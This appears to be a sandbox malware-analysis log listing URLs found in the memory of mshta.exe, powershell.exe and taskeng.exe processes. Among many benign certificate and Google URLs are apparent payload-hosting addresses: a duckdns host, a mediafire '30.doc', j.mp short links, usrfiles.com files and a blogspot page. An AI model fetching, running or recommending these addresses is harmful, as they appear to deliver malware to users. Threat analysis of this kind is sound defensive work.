Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440300722.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441540511.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mshta.exe, 00000010.00000003.483859380.0000000005642000.00000004.00000001.sdmp String found in binary or memory: http://csi.gstatic.com/csi
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000005.00000003.440300722.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441540511.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000005.00000003.440300722.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441540511.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.457364588.000000000565F000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/BlogPosting
Source: mshta.exe, 00000005.00000002.442223574.0000000004520000.00000002.00020000.sdmp, powershell.exe, 0000000B.00000002.453893933.0000000002390000.00000002.00020000.sdmp, taskeng.exe, 0000000F.00000002.672021301.0000000001BF0000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.499418426.0000000004200000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000005.00000002.442223574.0000000004520000.00000002.00020000.sdmp, powershell.exe, 0000000B.00000002.453893933.0000000002390000.00000002.00020000.sdmp, taskeng.exe, 0000000F.00000002.672021301.0000000001BF0000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.499418426.0000000004200000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000005.00000002.442002599.0000000004327000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 0000000B.00000002.453588226.000000000032F000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: mshta.exe, 00000005.00000003.430602975.00000000002DD000.00000004.00000001.sdmp String found in binary or memory: http://www.starinxxxgkular.duckdns.org/s1/30.txt
Source: mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000005.00000003.439129933.0000000003A3E000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.439246961.0000000003A4C000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441627561.0000000003A52000.00000004.00000001.sdmp String found in binary or memory: https://8d3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmp String found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfil
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmp String found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.c
Source: mshta.exe, 00000005.00000003.430608858.00000000002D2000.00000004.00000001.sdmp String found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.co4A
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmp String found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ug
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmp String found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8d
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmp String found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmp String found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_4
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmp String found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee
Source: powershell.exe, 0000000B.00000002.457407160.0000000003016000.00000004.00000001.sdmp String found in binary or memory: https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/
Source: mshta.exe, 00000010.00000003.495294389.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484623125.0000000005549000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/.js
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500891130.0000000005619000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?passive=true&continue=https://www.blogger.com/blogin.g?blog
Source: mshta.exe, 00000010.00000002.501168449.00000000056BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogge
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/div
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/ogspot.
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://apis.google.com
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483617923.0000000005AE5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.485867310.0000000002AB0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483590836.0000000005AEB000.00000004.00000001.sdmp String found in binary or memory: https://apis.google.com/js/plusone.js
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://artsandculture.google.com/?hl=de&utm_source=ogs.google.com&utm_medium=referral
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://books.google.co.uk/?hl=de&tab=jp
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://calendar.google.com/calendar?tab=jc
Source: mshta.exe, 00000010.00000003.483859380.0000000005642000.00000004.00000001.sdmp String found in binary or memory: https://csi.gstatic.com/csi
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/blogger-tech
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/forms/?usp=forms_alc
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=slides_alc
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=sheets_alc
Source: mshta.exe, 00000005.00000002.441579663.0000000003A07000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440369877.0000000003A07000.00000004.00000001.sdmp String found in binary or memory: https://download1370.mediafire.com/
Source: mshta.exe, 00000005.00000003.439738896.0000000000423000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441065797.0000000000423000.00000004.00000020.sdmp, mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp String found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.doc
Source: mshta.exe, 00000005.00000002.441059756.0000000000413000.00000004.00000020.sdmp String found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.doc...
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp String found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.docC:
Source: mshta.exe, 00000005.00000002.443517069.0000000006E80000.00000004.00000040.sdmp String found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.docFKWWSV
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp String found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.docPV
Source: mshta.exe, 00000005.00000003.438980428.0000000002BC5000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.438821906.0000000002BC5000.00000004.00000001.sdmp String found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.dochttps://download1370.mediafire
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/?tab=jo
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://duo.google.com/?usp=duo_ald
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://earth.google.com/web/
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/A
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/cap-
Source: mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496794465.000000000026D000.00000004.00000020.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484351334.0000000005626000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484481957.00000000033D7000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?lang=de&family=Product
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/iv
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/rder-r
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://hangouts.google.com/
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: https://i18n-cloud.appspot.com
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp String found in binary or memory: https://j.mp/L
Source: mshta.exe, 00000005.00000003.439711063.00000000003F3000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000005.00000002.440986147.000000000039E000.00000004.00000020.sdmp String found in binary or memory: https://j.mp/ODOASODOccomplermxjdajse
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp String found in binary or memory: https://j.mp/com
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp String found in binary or memory: https://jamboard.google.com/?usp=jam_ald
Source: mshta.exe, 00000010.00000003.483563430.0000000000441000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.497299815.0000000000465000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495605178.0000000000465000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.coC109
Source: mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/
Source: mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/.
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494890776.0000000005AE8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501500466.0000000005AE8000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/favicon.ico
Source: mshta.exe, 00000010.00000003.483563430.0000000000441000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.497299815.0000000000465000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495605178.0000000000465000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/feeds/post
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483563430.0000000000441000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488412884.0000000002ACF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495294389.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488324679.0000000002ACB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484623125.0000000005549000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.497299815.0000000000465000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.487928492.0000000002AC8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495605178.0000000000465000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488398920.0000000002ACD000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488337884.0000000002ACC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500649887.00000000055DB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488290964.0000000002AC9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483590836.0000000005AEB000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/feeds/posts/default
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/feeds/posts/default?alt
Source: mshta.exe, 00000010.00000003.488412884.0000000002ACF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488324679.0000000002ACB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.487928492.0000000002AC8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488398920.0000000002ACD000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488337884.0000000002ACC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488290964.0000000002AC9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483590836.0000000005AEB000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/feeds/posts/default?alt=rss
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/feeds/posts/defaultv
Source: mshta.exe, 00000010.00000003.484772166.00000000055A5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494957819.00000000055A5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500488420.00000000055A5000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/
Source: mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.html
Source: mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blog
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blog&bpli=1&followup=https://www.blogger.com/
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blogY
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.html...
Source: mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.htmlggC:
Source: mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.htmliC:
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494890776.0000000005AE8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501500466.0000000005AE8000.00000004.00000001.sdmp String found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/search
